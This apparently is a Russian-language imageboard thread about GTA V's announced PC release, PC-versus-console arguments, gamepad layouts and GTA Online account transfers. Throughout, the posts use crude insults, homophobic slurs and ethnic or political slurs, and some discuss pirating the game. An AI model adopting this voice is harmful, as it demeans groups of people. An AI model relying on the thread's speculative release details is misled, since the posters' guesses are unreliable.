Какая связь между тем, что всё есть в файле и структурой папок в линуксовой системе?
>Официальные от разработчика? И как много там софта? Ссылку пожалуйста.
http://habrahabr.ru/post/192716/
>Однако новые накопители ей нужно зачем-то минуту настраивать, прежде чем можно использовать. Почему?
Скорее всего, ищет в Windows Update официальный драйвер для девайса взамен майкрософтскому.
>Алсо, сетевая карта у тебя сразу на стандартных дровах завелась или таки пришлось ставить кое-что с диска?
>диски
>2014
Я уже лет 5, наверное, устанавливая винду на современные ПК, доустанавливаю лишь драйвера для видео и звука (это всё работает и без этого, но официальные дрова умеют в более тонкую настройку и лучшую поддержку железа).
>На всё были ответы - гугли/скачай программу
А как новичку разобраться в консоли? Иди в гугл, кури мануалы, ищи значение каждой комманде. ИЧСХ, оно может не всегда работать.
Поссал в рот унылым школьникам которые наскребли "НЕРЕАЛЬНЫЕ" копейки деньги на дешевую консоль старого поколения ради ЖТАШЕЧКИ!!!!! И провели масштабный бета тест для ПК господ и Господ с приставками нового поколения. А теперь срут жидкой магмой от того что их пк "для учебы" не потянет ее даже в мечтах а снова выпросить у мамы денежек на новю консоль теперь не получится.
- Ты что далбаеб!? Я же купила тебе уже Плейстейшон уебок!
- Ну мам ну там типо жташечка на новых консолях вышла а у меня нищеебский пк и старая консоль.. ну мам. ну.....
Имхо после прочтения всех тредов, срачи возникают только от таких детей.
Жму руку ПК и PS4 господам. Xone в этом поколении обосрался.
>>7893562
>Xone в этом поколении обосрался
Как он мог обосраться, если на нем игры есть, а на пс4, по доброй традиции - нету?
>>7893597
>Xbox One
>игры
>переиздания Halo
>пара эксклюзивных инди
>пара мультиплатформ
>>7893597
Да-да, снова старая шарманка заиграла, теперь уже на новый лад.
>>7893597
Производительности на нем нет в отличие от ps4.
Перечисли мне теперь годных экзов вышедших на ящике ?
>>7893597
СОси жирный хуй. Далбоебышка потратившийся на ХУАН
>>7893597
Использует святой пекарский аргумент, дабы обосрать вражескую платформу. Фу таким быть.
>>7893619
Почему в этом списке упоминаются невышедшие игры? Их-то еще нет. Вот когда будут — тогда и приходите.
>>7893620
inb4 толку от производительности, если игр нет.
>>7893620
>Производительности на нем нет в отличие от ps4.
Битвы инвалидов.
>>7893597
Из анонсированных проектов только для бокса одна инди Ок, подождём ещё полгода, может, ещё чего-нибудь завезут. Цена на 100$ выше ПС4 инб4 100 баксов - не деньги, херовый плиточный интерфейс а-ля Шиндовс 8, долго запускающиеся приложения, геймпад, сделанный долбоёбами для долбоёбов. Продолжать долго можно.
Да ёпта, даже Тоха Жирный его обосрал.
>>7892588
Да ты охуел! Чего только стоит миссия с блоггером.
>>7893720
Именно. У пс4 игр потенциально больше, чем у хуяна, не более.
>>7893784
Как дела в 2010? Скоро на 4 гигах рам только тетрис будет работать?
>>7893814
Бля, ещё один умник. Нет возможности установить x64 по крайней мере основной системой проебётся важный софт и железки, нужные для работы.
>>7893597
> прошло пол-года с начала продаж
> ОЙ ПИЗДЕЦ БЕДА ОГОРЧЕНИЕ ИГОР НЕТ ЧТО ЖЕ ДЕЛАТЬ А ТЕ ЧТО ЕСТЬ - ГОВНО, ВСЕ ПРОЕБАНО ДАВАЙТЕ ЛЯЖЕМ И УМРЕМ
Имейте терпение, господа.
Вы как будто впервые запуск консоли видите.
Всю жизнь(ну может кроме консолей до пятого гена включительно, и то с исключениями) в начале поколения игорь тонет; платформодержатели клепают на скорую руку в основном каловые эксклюзивы чтоб подстегнуть продажи; сторонние издательства воротят морду от нового поколения и держатся за старое еще года два, т.к масса потребителей и соответственно прибыли идет с него, а от "некстгенов" профита как с козла молока.
Плюс, графон в начале поколения всегда где-то уровня лучших проектов поколения предыдущего, да еще и усугубляется кроссген-играми.
Короче, ждите еще года полтора, игр должны подвезти.
>>7893858
Хочешь, научу тебя как установить х64 основной системной и не проебать х86?
>>7893858
>проебётся важный софт и железки, нужные для работы
Какие, бля? Почти все работает и на спермерке без проблем.
>>7893732
>геймпад, сделанный долбоёбами для долбоёбов.
Всё вроде верно, но вот тут поссал на тебя, уж извини.
>>7893952
Тебе серьёзно нравится эта хуита? Ну нахрена они левый стик поменяли с крестовиной местами?
>>7893990
Наркоман, в 360-м тоже так было, и ничего, играли. Даже считали лучшим геймпадом ever.
>>7893493
> В вашем посте присутствует слово из спам-листа, постинг запрещен.
Абу, блять сука ебать тебя в сраку твоей же ногой.
>>7893990
Щас прибежит какой-нибудь боксопидор или утенок, у которого х360 геймпад был первым и единственным падом в жизни, не считая китайское говно монстроузорных форм и начнет доказывать, что это дохуя инновационное решение и так гораздо удобнее!
>>7894051
Но у 360 и правда геймпад гораздо удобнее, чем у пс3.
>>7894051
Не, нихуя. У меня первым был Дуалшок 2. Потом был Дуалшок 3. Потом для пеки купил боксопад. Некоторое время привыкал к расположению стика, а потом понял, что он лучше Дуалшока во всём, кроме ебучей крестовины в файтингах.
>>7893995
Назови мне кокнертную программу, которая не работает на 64битке? Кроме сраного иджея я лично ничего такого не знаю.
>>7887175
>HQ
>>7894071>>7894081
Крестовина в этом паде просто как земля. Из-за специфической формы у меня почему-то немеет левая рука, в области большого пальца спустя всего пару часов игры. На дуалшоке такой хуйни нет. Некоторые индивиды заявляют, что с 360 пада удобнее играть в шутеры, с какого хуя они так решили, я до сих пор понять не могу.
>>7894051
Утёнок, зачем ты проецируешь? У многих в детстве была первая плойка, а дизайн дуалшоков так и не изменился со временем. А ещё и к сеге были такие же рогатые геймпады иногда. Так что тут как раз большинство играет на ссаных дуалшоках ПО ПРИВЫЧКЕ, юзая неудобные стики, приближённые друг к другу, будто клиторок шлюхе массируешь.
>>7894122
> дизайн дуалшоков так и не изменился со временем
DS4 показали 1,5 года назад.
> юзая неудобные стики, приближённые друг к другу
Опять же, у DS4 стики дальше друг от друга, чем у предыдущих.
И вообще, у боксовской схемы преимущество только в шутанах, а сравение падов в шутанах - это сорта говна и битва инвалидов.
>>7894121
С того что курки на дуалшокопараше ебаное говно
>>7894133
Ну вот значит пад майков не подходит для моих рук. И вот рука немеет именно блядь левая и как пить дать, связано это именно с ебанутым расположением стика.
>>7894013
Ну, это не заслуга и изобретение пада 360го.
В длц будет новый герой?
>>7894200
И чо?
>>7894212
> Один хуй они практически ни в каких играх не используются нормально
Вылезай уже из своего манямирка образца 1995 года.
Есть 3d в игре - одними крестовиной и ABXY никак не обойтись.
>>7894210
Лол. Это чистая правда. Возможно х360 пад вреден для здоровья и ведет к ампутации конечностей в итоге. Вот увидишь, вырастет целое поколение безруких геймеров.
В DLC добавят новый город или нет?
>>7894212
В дельта форсе на них висело управление перекрестием. Ещё где-то юзал их, но не помню уже. Главный бонус был конечно вибрация, особенно в гоночках всяких.
>>7894159
Незначительные изменения. Вообще, удобный гейпад, но сами стики даже мешают. А боксовскому желательно левый рок удлиннить, чтобы крестовина удобнее стала, не знаю зачем надрачивать на симметричность корпуса.
Геймпады хуйня, для ебаклаков.
Господа бета-тестеры, либо заткните клювы, либо проследуйте к себе на парашу! Нахер тут свои джойстики обсуждать?!
>>7894242
Я имел ввиду - в играх для ps1. Там в шутерах сплошь тракторное управление было с ацким авто-наведением. А чисто 3д игр не так много было. Тот же 3д Креш бандикут не смотря на полностью трехмерный движок, использовал 2д геймплей, где бежишь либо вперед-назад, либо слева-направо.
Почему Тревора сравнивают с Клодом?
>>7894291
А я и говорю о плоечном. Просто треугольника-креста-и т.д на клавиатуре нет, абху быстрее написать получается.
>>7894245
Ну вот ты и вытек. Хотя с тобой сразу всё ясно было.
>>7894311
Вот без рук останешься, посмотрим кто будет смеяться последним. Тред только не забудь создать потом. Я свой х360 уже давно на помойку выкинул.
>>7894343
Я ж грю, там управление тракторное было. Тебе знакомо такое слово?
http://lurkmore.to/Тракторист
Эй, пекари. Отыграл в ГТАО дохуя, и у меня 2 вопроса
1)Рокстары правда перенесут моего аутиста на пека?
2)Можно скачать репачок от вована, залогиниться в сошал клаб и не покупать этот криво работающий кусок говна?
>>7894200
Аллах всемогущий, какие же геймпады у первого Бокса страшные!
>>7894372
1 - Да.
2 - Нет, так как при запуске игры тебя спросят ключ, который привяжут к твоей учетке.
Быстро блядь выбрали!
>>7894372
1)Да.
2)Недавно в МП3 занесли обнову, что акк и его контент должен быть привязан к Стиму. Скорее всего в ЖТА5 так же будет.
>>7894471
Держи, бро.
>>7894455
> У меня при каждом запуске требует привязать стимоакк к RGSC. Каждый раз соглашаюсь, и всё равно эта хуита повторяется.
У меня тоже. Ананасы говорили, что там какая-то нагрузка на сервера Роков в последнее время.
>>7894398
Возьму пики точены, срублю хуи дрочены, сам сяду и в пеку играть буду, ёбана.
http://www.ign.com/articles/2014/06/15/grand-theft-auto-5-to-be-enhanced-for-pc
>GTA5 promises to "take full advantage of the power of PC," with various improvements such as higher resolution and graphical detail, denser traffic, greater draw distances, upgraded AI, and advanced weather and damage effects.
>The epic open-world game will also feature "new wildlife" and a video editor for advanced movie-making.
>GTA5 for PC includes Grand Theft Auto Online, and the listing promises that all content added since launch - including such things as new jobs and customisations - will be present in the PC version.
>>7894372
>1)
Вроде как, при наличии акка RGSC.
>2)
Да. Так же можно было с максом пейном 3.
>>7895965
Поторопился чутка, надо было этот выкладывать. У первого гамма уебищная и нереалистичная, тут получше будет. Кстати, на ОП-посте скриншот именно с этим модом сделан.
Бамп хуевому треду.
>>7896165
Это с чего бы это он хуёвый?
Про нестген:
Diablo 3 будет исполняться в разрешении 900p на Xbox One и 1080p на PS4 при 60 кадрах/с
http://www.3dnews.ru/822080/?feed
ололо
Допрошел эпизоды. Боже, как же мне порвали жопу последние две миссии за Луиса. Начал их выполнять с 36К долларов, закончил с 5К, все спускал на больницу и расходники.
Тред умер?
>мечтаешь о жизни как в GTA V
>тебе 20 лет и ты хикки-социофоб
>не работаешь, живешь с мамой, образование 9 классов
>то самое чувство
Когда в богодельне предзаказ откроют?
Да не выйдет она на пк
>мечтает о жизни как в GTA online
>в тред никто не хочет писать
>все успешные и на работе
>то чувство когда на твои посты не отвечают
>Подразумевает, что всем не похуй на это говно которое все нормальные люди прошли на консолях
>>7899326
Да ладно тебе, я вообще треды убиваю.
Стоит написать раз и всё, у всех сразу пропало желание постить.
Почему скорость постинга так упала? День назад за 20 часов уходили треды в бамплимит.
>>7899357
А что обсуждать? Пастгеноблядки еще год назад тут все засрали своими обсуждениями. Теперь все всё знают и остается только ждать нормальную версию осенью.
Какое-же четверка унылое говно. И ведь на ее разработку потратили 100кк
Вот это отсос.
>>7899394
Зато когда она выйдет, треды будут где то пол года висеть, или даже больше.
>>7899395
Двачую унылость. Лучше уж в сейнтс ров играть чем это, там такой то угар дилдак-бита, людей раскидываешь, можно типа срать анимация, куча шмоток всяких и супергеройский костюмы тачки бьются горят миссии вообще ржака, вот это реально угарно не то что четвёрка унылая.
Предлагаю вообще как-нибудь запилить тред посвященный гта-клонам. Вот я сам сейчас сел мерценариес 2 наворачивать, ибо делать не хуй. Думаю, почему бы и не обсудить?
Такие треды могут держаться вплоть до выхода пятерки.
>>7899414
Я не про то. Вот почему в 5 интересно играть, даже тупо гонять на шоссе под репчик, а в 4-ке такого нет?
Я на консоли играл 2 недели и ее прошел, если что. (консоль не моя, я пекалорд)
>>7889950
Что не отменяет комичных моментов. Простебывания качков, мафии, неудачных грабителей, геев, блогов, ТВ и прочей еболы.
>>7899452
Я выключил и удалил это говно, когда услышал РАНЕТОК по радио
Дату выхода уже объявили?
>>7899520
И Цой, и Серега, даже зеленоглазое такси.
Владивосток фм же.
>>7893769
Тащемта я согласен с тем аноном. DLC про гея Тони пиздец какое говно. Мерзкая ссанина.
Для меня оно выбивается из общего тона серьезной сатиры оригинальной 4ки и DLC про outlaw MC и превращается в блевотные кривляния. А у нас арабы в трусах и с Узи поют arab money.
а через 5 секунд меня пристрелили.
>>7899621
>Эта текстурка руки
Нахуй иди, и говно свое отсюда забери.
>>7899463
Никто не мешает тебе слушать другое радио. А вообще мне кажется, что Владивосток ФМ очень соответствует духу русского квартала в GTA. Да и вообще я видимо аутист, потмоу что мне было заебись ездить по Хоув бич ночью и слушать это радио. Очень лампово, едешь в разбитой, старой, покоцаной, даже не тобой, машине и слушаешь
МЫ ЛЕГЛИ НА ДНО
МЫ ЗАЖГИ ОГНИ
ВО ВСЕЛЕННОЙ
ТОЛЬКО МЫ ОДНИ
Очень лампово.
>>7899634
да у вас бугурт, товарищ.
>>7899675
Ну эта песня Сплинов ещё и в Брате была, так-что...
Не знаю что.
>>7899697
Отличный фильм, хотя я смотрел только первую часть (на девятое мая). Люто понравился. Анон, стоит смотреть вторую часть?
Алсо, про Сплин во второй части знал.
Как вариант катаюсь по Хоув бич под
ВСЕ МЫ ГЕРОИ ФИЛЬМОВ ПРО ВОЙНУ
ИЛИ ПРО ПЕРВЫЙ ПОЛЕТ НА ЛУНУ
ИЛИ ПРО ЖИЗНЬ ОДИНОКИХ СЕРДЕЦ
У КАЖДОГО ФИЛЬМА СВОЙ КОНЕЦ
НИКОГО НЕ ЖАЛКО НИКОГО
НИ ТЕБЯ НИ МЕНЯ НИ ЕГО
НИКОГО НЕ ЖАЛКО НИКОГО
НИ ТЕБЯ НИ МЕНЯ НИ ЕГО
Этого жирного оцелота Тоха спонсирует, спешите видеть!
Голос через морфер сменил 100%!
http://steamcommunity.com/app/271590
Вата пригорела. Рокстары унижают пидорах в их собственном треде.
Я решил что буду отыгрывать негра-хипстера в гта онлайн, а вы?
>>7900213
Это эталонное быдло, которое в основном в доту и кс играет.
Я прочитал весь первый и половину второго треда, проигрываю как ватники ненавидят "бездуховный гей запад" и в то же время пользуются сервисами США.
абложаетесь вы дауны графика не будет лучше у вас не патянет
>>7900478
Бро, на это никто не ведется уже. Я сам каждый день такие вбросы делаю, чтоб тред оживить.
>>7899918
Нет, я пил коньяк. Потому что мой дед воевал не на победившей стороне.
Игру запретят в России из за радужных парашютов.
>>7899429
> Я не про то. Вот почему в 5 интересно играть, даже тупо гонять на шоссе под репчик, а в 4-ке такого нет?
Я не знаю, как ты играл в четвёрку. Пока я так душевно катался под разное радио в разную погоду, Либерти-сити стал для меня сотней оттенков коричневого фильтра такого неразнообразного с первого взгляда города. Из-за того, что территория всего Либерти довольна мала, я уже наизусть помню весь город и доберусь куда-угодно по маршруту быстрее, чем ЖПС. Очень надеюсь, что в пятёрке так же душевно.
>>7891274-кун
>>7900590
Пригород очень душевно сделан.
Почему все, кто в гта онлайн грабят магазин, после получения денег всегда убивают продавца, после чего имеют увлекательный анальный секс с трехзвездочной полицией?
Вспомнил, как год назад, после выхода трейлеров, хотел быть, как Тревор - подстричь часть волос на голове, носить всегда одну и ту же белую футболку, засаленые джинсы и старые часы. И постоянно на всех орать. 21 лвл.
>>7901496
Ну, тогда я не знал, что он лютый пиздолис и тряпка.
Эй, если я наиграл дохуя часов на плойке, то рокстары перенесут мой ГТАО профиль? Придётся ещё раз купить этот неработающий кусок мультиплеерного говна, который будет выдавать знакомые 30 кадров в фулашди, или рокстары у мамки не жадные?
>>7901724
Профиль перенесётся, а вот купить придётся снова, это уже проблема не Рокстара.
>>7901732
Чому не проблема рокстара? Аккаунт сошал клаба привязывается к ПСН, без этого по сети не сыграть. Если я качну репачок от Вована и залогинюсь в профиль, который привязан к ПСН, то с меня ключ потребуют? Нахуя тогда? Вангую оптимизацию как с гта 4, лежащий целую неделю сошал клаб. Рокстары не могут в мультиплеер, а покупать игры без мультиплеера нет смысла
>>7901384
А чё, продавец - переодетый коп, чтоб за него 3 звизды давать?
>>7901758
>Чому не проблема рокстара?
Потому что ты купил игру у Сони, а её не ебёт, что ты собираешься поиграть на какой-то другой платформе.
>Аккаунт сошал клаба привязывается к ПСН, без этого по сети не сыграть.
Для сихнронизации статистики и трофеев.
>Если я качну репачок от Вована и залогинюсь в профиль, который привязан к ПСН, то с меня ключ потребуют?
Нет. Потому что ты, во-первых, не сможешь залогиниться на пиратке, а во-вторых, ключи для ПК-версии будет продавать Стим.
>Вангую оптимизацию как с гта 4, лежащий целую неделю сошал клаб.
Как же меня заебали диванные программисты с их ОПТИМИЗАЦИЯМИ. Будет работать также, как Максимка, ибо это не порт.
>>7899429
Потому что мало шоссе? город всё-таки. Хотя и так можно понизить плотность траффика, набить скилл вождения, врубить свой ссаный репчик и рассекать по длинным мостам, наслаждаясь тёмными огнями города. А ещё можно на такси из конца в конец пассажиром кататься и аутировать.
>>7901805
ГТА 4 была портом, потому что изначально пилилась вместе с их новым движком под иксбокс, потом её перенесли на пс3 и затем уже на ПК. А ГТА 5 везде хорошо работает.
>>7900213
Пиздец скам, грязь ебаная со стереотипным мышлением. Потешаются над европейцами и гомосексуализмом, рвут волосы на жопе от того что их отовсюду гонят и закрывают их темы, да ещё и радуются что в рашке игра будет стоить дешевле. Пидорахинское быдло, как же противно. Был бы я модератором, забанил бы их вообще нахуй на всех форумах стима.
>>7901903
Ты тоже быдло, потому что других называешь быдлом, исходя из стереотипов уровня двача.
>>7901903
Стимоблядей в /fag отправить как и с лексплеерами поступали, вообще заебись жить тут станет.
>>7901935
Но вот я например пользуюсь стимом и ты прикинь я там играю в игры! Мы там скидочки обсуждаем и выгодные сделки.
>>7901930
Ты же сам этих аргументов на харкаче наслушался, а теперь пользуешься, не осознавая что они не имеют веса совсем. Похоже скорее на детское "кто обзывается, тот сам так называется". Учись думать самостоятельно.
>>7901935
>Стимоблядей в /fag
А как же /ga/ is for Gaben?
>>7901993
Лексплейщики тоже в /d/ долго божились что у них там обсуждение игр и собственно летсплейщиков, а не фагготория по каким-то шлюхам, аватаркобляди и неймпидоры.
Зашёл в стимотред:
>пуказоид
>каждый второй пост про карточки
>левые ссылки на наёб стимодетей и воровство аккаунтов
>юнофаг с аватарками
>доброе утро
Это давно рассадник рака и школьников, лично мне, как более менее адекватному стимодебилу, было бы просто неприятно сидеть в тредах, полностью захваченных такими вот личностями. Предлагали же создавать в ВГ треды только на дни распродажи. Обменяться стимакками чтобы поиграть во что-то, можно в треде по этой игре (когда обмениваются просто чтобы друзьяшек себе набить, как вконтактике - ну тут понятно всё), всё остальное можно обсудить и в /га/ /фаг/.
>>7902498
>Зашёл в стимотред
Поздравляю, ты зашкварен на всю жизнь. Я хоть и стимоблядь, но я в тот тред - ни ногой.
>>7901903
>радуются что в рашке игра будет стоить дешевле
А чему тут не радоваться? Вы уже заебали со своими комплексами.
>>7902543
Какими комплексами, болезный? Просто вкупе со всем остальным (писал один автор), это выглядит так, будто какой-то нищеброд и шакал скалится на своих господ и как гиена усмехается что у них игра дороже и вообще европа полна пидоров (как что-то плохое), а потом идёт покупать игрульку в западном интернет-магазине.
Я не из тех кто кукарекает о достатке и нищебродстве, в другой ситуации я бы и внимания не обратил.
>>7902593
>а потом идёт покупать игрульку в западном интернет-магазине
Двачую этого. Гораздо патриотичнее скачать ее на отечественном торрент-трекере.
>>7902593
>полна пидоров (как что-то плохое)
Ну если ты до сих пор не знаешь языка, на котором пишешь, - у слова "пидор" нет ни одного хорошего значения и ни одного нейтрального.
>Я не из тех кто кукарекает о достатке и нищебродстве
Нет, ты как раз из этих. Еще и про пидорах тут распинаешься.
>>7902617
Ок, речь шла про геев, гомосексуалистов, я утрировал для вегетардов и возможных местных ватных гомофобов.
>Нет, ты как раз из этих.
Думай как тебе угодно, психолух.
>>7884527
Школьник написал конфиг своего нищепека и подписал что это сис.требования. 650 печ даже в 2гб версии говно говнейшее.
>>7902647
ГТА 5 ОСКОРБЛЯЕТ РУССКИХ
>>7902691
Чем Ti об обычной отличается? У меня вот GTX 560 - это хорошо, или говно на палочке?
>>7902888
Ti - значит titanium
У обычной 560 выключен один из потоковых мультипроцессоров и, как следствие, она чуть слабее.
Сравнение можно посмотреть здесь: http://www.overclockers.ru/lab/41792/Bez_Ti_obzor_i_testirovanie_GeForce_GTX_560.html
Бамп элитному трэду.
>>7903010
Ну, а включить его обратно нельзя никак? Как в процессоре, например, джва ядра разблокировал - и хуяк, процык уже шестиядерный!
Я слышал, что можно дешёвые машины угонять и брать себе, а дорогие нельзя. Так вот дешёвые - это до скольки тыщ?
Ну и бумп заодно.
Графончик в гта 5 похуже 4 с енб.Да и школотня будет орать с хуевой оптимизации
>>7910246
>Графончик в гта 5 похуже 4 с енб
Выкатывай скриншоты ПК версии.
>>7910246
Я не школота, но я тоже буду орать. Потому что надо быть тотальным говноедом, чтобы не раздражаться с политики "мы выпустим недопиленную лагучую хуету, эти пидоры и так купят".
>>7910302
Из-за подробной физической модели машин в IV это видео выглядит довольно правдоподобно по отношению к другим видео из игр. В пятёрке это не проебали?
>>7910330
По большей части проебали. Возможно, частично исправят модель повреждений в пека-версии, если слухи про изначальную разработку для пека/некстгена верны. Но управление - хуй знает, я думаю его поменяли из-за школьников, которые не осилили нормальное управление и захотели как в любимом НФС.
>>7910521
Управление стало даже хуже чем в Сан Андреасе? По видосам мне так и кажется.
>>7912830
Наверное да. Ну как, на этом движке, со всей этой физикой и анимацией, управление из СА здесь было бы как земля, а для самого СА оно охуенно. Но тут ощущение будто немного не к месту это всё, скорости слишком большие, вес ощущается куда меньше, а ХП у машин как у танка. По управлению что-то типа НФС андерковер, а по весу машин ближе к сейнтс роу.
>>7912830
В принципе, вроде похоже на управление СА по манёвренности, но ощущения совсем другие, я хуй знает короче.
Вот тут самое наглядное видео где видна вся убогость (или шедевральность) нового поведения машин.
>>7884543
Как, блять, можно быть против ценностей, которые с детства были впитаны умом и душой еще 4 поколения назад? Или ты из семьи егеря Петрова из чукотки?
>>7884983
Хуило не знает, что в колде еще с самой первой части юзается idtech4, который, кстати был довольно популярен.
Проиграл с меток.
>>7893990
Лол. Я тебе по секрету скажу, что это они у гейкьюба подглядели. Алсо, так все же удобнее, чем на дуалшоке.
>>7913314
Вангую, что уже через неделю после выхода на пеке появится исправленный handling, с которым будет интересно ездить.
>>7917790
Хендлингов будет хренова туча, к тому же выпустят очередной OpenV, и все будут выпускать свои школосборки ADVANCED DRIVING.
Я вспомнил, как полгода назад выложил скрин с тем, как рокстар выложили вакансию, в которой было так и написано:
>любит пека-гейминг
>опыт работы с directx/x96
>помощь с переносе одного из наших тайтлов на ПК
А консолебляди наперебой включили мощнейшее ВРЕТИ, ЭТО НИХУЯ НЕ ЗНАЧИТ
А сейчас: ИГРА ГОВНО ДА НЕ ОЧЕНЬ ТО И ХОТЕЛОСЬ НАХУЙ НУЖНО КУДАХХХ
Господи, такого эпического отсоса я за свои 25 лет жизни не припомню. :3
>>7884959
>всасываются в сам металл
Хули ты пиздишь, они на нём оседают, легко вывести обычной полировкой намыленной тряпкой.
>>7913314
>эта модель повреждений
>эта поворачиваемость
>эта железобетонная белая машина, от которой красная отскочила как мячик
Отвратительно.
Господи, даже в смотри_собаках лучше.
>>7918470
Так ещё с момента выхода в игре нашли файлики, прямо указывающие на разработку пека версии.
>>7918608
Есть.
Подруга детства.
>>7918426
Да ладно вам, конечно 720p, конечно мыльновато, конечно детальность не самая лучшая, но все равно графон красивый, пейзажи душевные. Рокстары смогли из такого то железа сделать одну из самых красивых игр для консолей прошлого поколения.
>>7918470
>до анонса
Мыльное говно для школьников-сосноледаунов.
>после анонса
Сосноли соснули, вин века - на пека!
>>7918724
До анонса:
>выйдет на пека - поиграю, не выйдет - не поиграю, хуй с ним
Консольщики:
>НЕ ВЫЙДЕТ ВРЕТИ ЭТО АУТОТРЕННИНГ ВЫ ТАК ЖАЖДЕТЕ НАШЕГО СЛЕПЯЩЕГО ВИНА НО ХУЙ ВАМ АХАХАХ
После анонса:
>О, таки выйдет? Замечательно, еще одна хорошая игра в этом году
Консольщики:
>АХАХА ОБЪЕДКИ С БАРСКОГО СТОЛА А ИГРА-ТО ГОВНО
Иди нахуй.
>>7918750
Соснул ты, если ищещь тут противоречия и воспринимаешь всю эту хуйню всурьез. Уже после анонса было ясно на 146%, что она выйдет на пеке. Точно так же было и с четвертой.
Рокстар не станет упускать возможность заработать сотни денег, поэтому никаких эксклюзивов аля мыловарня-only.
>>7918825
Какого это кушать уже сгнившую еду? Похуй, пекарь доест.
>>7918856
Каково это играть на устаревшем еще до выхода железе с мыльной графикой? Похуй, соснульщик съесть любое дерьмо.
Из-за таких как ты в GTA V испортили управление.
Смотри шире, еблан. Тут никаких войн платформ - только бизнес. Рокстар продает одну и ту же игру несколько раз. Сначала доит соснольщиков, а когда продажи идут на спад, они понимают, что сняли основные сливки и анонсируют на пк.
>>7918724
>Мыльное говно для школьников-сосноледаунов.
Так оно и есть. Но теперь пека боги доведут игру до ума с помощью божественных модов, которые консолеплебеям никогда и не снились.
Продолжаем обсуждать игру выход самой срачепровоцирующей игры года на ПеКе и некстгене.
Что нас ждет в лучшей версии игры поколения:
>Улучшенные эффекты, погода, текстуры, освещенин, AI и модель повреждения, новые животные, высокие разрешения, увеличенная дальность прорисовки, большее кол-во трафика и пешеходов, пользовательское радио, оптимизация как в Max Payne 3, избавление от ебучего GFWL, полная интеграция в Steam, DX11, HBAO, теселяция, божественное управление клавомышью, новейший видеоредактор, а так же множество других улучшений и нововведений и конечно же DOOSHA.
Страница лучшей версии игры в Steam:
http://store.steampowered.com/app/271590
Предзаказ на некстген можно будет сделать тут:
http://www.rockstargames.com/V/order
YOBA сквад в RG social club чтобы нагибать вместе с аноном:
http://ru.socialclub.rockstargames.com/crew/yoba_squad
Вопросы треда:
1) Порт с некстгена или самостоятельная версия? В чем преимущества первого и второго?
2) Когда появится первая инфа? Предположительное время выхода?
3) Как Рокстар собирается поддерживать GTAO? Воркшоп в среде ЖТА, его преимущества и недостатки.
Сошиал клаб сейчас крайне хуево работает, попробуете зарегистрироваться/сменить_данные позже.
Оп-пост тут - http://pastebin.com/u4Bqxtni